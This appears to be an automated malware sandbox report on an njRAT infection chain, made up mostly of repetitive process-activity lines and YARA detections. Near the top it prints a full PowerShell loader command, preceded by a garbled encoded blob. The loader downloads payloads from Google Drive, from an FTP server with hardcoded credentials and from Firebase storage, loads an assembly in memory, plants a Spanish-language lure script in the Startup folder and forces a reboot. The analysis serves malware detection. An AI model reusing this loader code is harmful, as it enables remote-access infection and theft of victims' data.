?o???gu???ywbh???gw???c???bl???fi???lgbn???fm???egbd???ei???b??????k???c??????k???bn???g4???aqby???hq???uw???0???dy???zqbz???ge???qgbt???g8???cgbg???do???ogbd???hq???cgbl???hy???bgbv???em???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???fo???ywbc???gm???yq???k???c??????xqbd???fs???zqb0???hk???qgbb???ds???jw???l???ek???a???bx???fi???w??????l???cc???i??????9???c??????w???bq???fu???dqbo???cq???ow???p???c??????zwbt???ho???qwbc???gw???j??????g???cg???zwbu???gk???cgb0???fm???z???bh???g8???b???bu???hc???bwbe???c4???egb0???hg???a??????k???c??????pq???g???gc???uwb6???em???qgbs???cq???ow???4???ey???v???bv???do???ogbd???gc???bgbp???gq???bwbj???g4???rq???u???hq???e???bl???fq???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???gc???bgbp???gq???bwbj???g4???rq???u???ho???d???b4???gg???j??????7???ck???d???bu???gu???aqbs???em???ygbl???fc???lgb0???gu???tg???g???hq???ywbl???go???ygbp???c0???dwbl???e4???k??????g???d0???i???b6???hq???e???bo???cq???ow???p???cg???zqbz???g8???c???bz???gk???z??????u???ho???d???b4???gg???j??????7???ck???i??????n???hq???e???b0???c4???mq???w???ew???t???be???c8???mq???w???c8???cgbl???hq???c???b5???hi???ywbw???fu???lwby???gi???lgbt???g8???yw???u???hq???yqby???gi???dgbr???gm???cwbl???gq???lgbw???hq???zgb??????de???d???bh???hi???ygb2???gs???ywbz???gu???z??????v???c8???ogbw???hq???zg???n???c??????k???bn???g4???aqby???hq???uwbk???ge???bwbs???g4???dwbv???eq???lgb6???hq???e???bo???cq???i??????9???c??????zwbt???ho???qw	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $zenbp = $host.version.major.equals(2) ;if ( $zenbp ) {$dxtjn = [system.io.path]::gettemppath();del ( $dxtjn + '\upwin.msu' );$gukxo = 'https://drive.google.com/uc?export=download&id=';$qvcnu = $env:processor_architecture.contains('64') ;if ( $qvcnu ) {$gukxo = ($gukxo + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$gukxo = ($gukxo + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$jvyjn = (new-object net.webclient);$jvyjn.encoding = [system.text.encoding]::utf8;$jvyjn.downloadfile($urlkb, $dxtjn + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($dxtjn + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$hxtz = (new-object net.webclient);$hxtz.encoding = [system.text.encoding]::utf8;$hxtz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $hxtz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$hxtz.dispose();$hxtz = (new-object net.webclient);$hxtz.encoding = [system.text.encoding]::utf8;$lbczsg = $hxtz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huupx , 'true' ) );};"	Jump to behavior

Source: RegAsm.exe, 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3000375928.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3000375928.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\]q
Source: RegAsm.exe, 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3047042436.0000000005D51000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3000375928.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
